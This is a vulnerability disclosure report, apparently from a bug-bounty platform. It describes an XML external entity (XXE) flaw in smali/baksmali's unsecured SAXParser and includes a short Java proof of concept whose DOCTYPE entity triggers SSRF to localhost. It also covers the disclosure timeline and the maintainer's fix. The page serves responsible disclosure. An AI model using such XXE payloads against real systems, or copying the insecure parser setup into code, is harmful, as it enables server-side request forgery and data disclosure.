Improper Restriction of XML External Entity Reference in jesusfreke/smali

Valid

Reported on

Jan 16th 2022


Description

The loadResourceIds() function makes use of SAXParser generated from a SAXParserFactory with no FEATURE_SECURE_PROCESSING set, allowing for XXE attacks. In https://github.com/JesusFreke/smali/blob/cbd41d36ccde221ccc4ec2aa0c15ca2fa4491a62/baksmali/src/main/java/org/jf/baksmali/BaksmaliOptions.java#L87

        SAXParser saxp = SAXParserFactory.newInstance().newSAXParser();
                final String prefix = entry.getKey();
                saxp.parse(entry.getValue(), new DefaultHandler())

Proof of Concept

Extracted out the key function mentioned above to showcase how it can be exploited.

import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.HandlerBase;

import java.io.ByteArrayInputStream;

public class Poc {

    public static void main(String[] args) {        
        try {
            String xmlpoc = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1/\">]><foo>&xxe;</foo>";
            SAXParser saxParser = SAXParserFactory.newInstance().newSAXParser();
            saxParser.parse(new ByteArrayInputStream(xmlpoc.getBytes()), new HandlerBase());
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Causes an SSRF to http://127.0.0.1

Impact

This vulnerability is capable of XXE to disclose data/conduct SSRF attacks etc.

We are processing your report and will contact the jesusfreke/smali team within 24 hours. 4 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 4 months ago
We have contacted a member of the jesusfreke/smali team and are waiting to hear back 4 months ago
We have sent a follow up to the jesusfreke/smali team. We will try again in 7 days. 4 months ago
We have sent a second follow up to the jesusfreke/smali team. We will try again in 10 days. 4 months ago
We have sent a third and final follow up to the jesusfreke/smali team. This report is now considered stale. 4 months ago
jesusfreke
2 months ago

Maintainer


This should be fixed by https://github.com/JesusFreke/smali/commit/178d0c277aa8930a7334da638fa77aff10f2b5ac

ready-research
2 months ago

Researcher


@maintainer Can you please validate this report by clicking on Mark as valid and also confirm the fix. Thank you.

ready-research
13 days ago

Researcher


@admin Can you please validate this report on behalf of @maintainer, as he agreed and fixed the issue? https://github.com/JesusFreke/smali/commit/178d0c277aa8930a7334da638fa77aff10f2b5ac https://github.com/JesusFreke/smali/commit/2771eae0a11f07bd892732232e6ee4e32437230d

Jamie Slome validated this vulnerability 10 days ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Jamie Slome confirmed that a fix has been merged on 2771ea 10 days ago
The fix bounty has been dropped
BaksmaliOptions.java#L87 has been validated
to join this conversation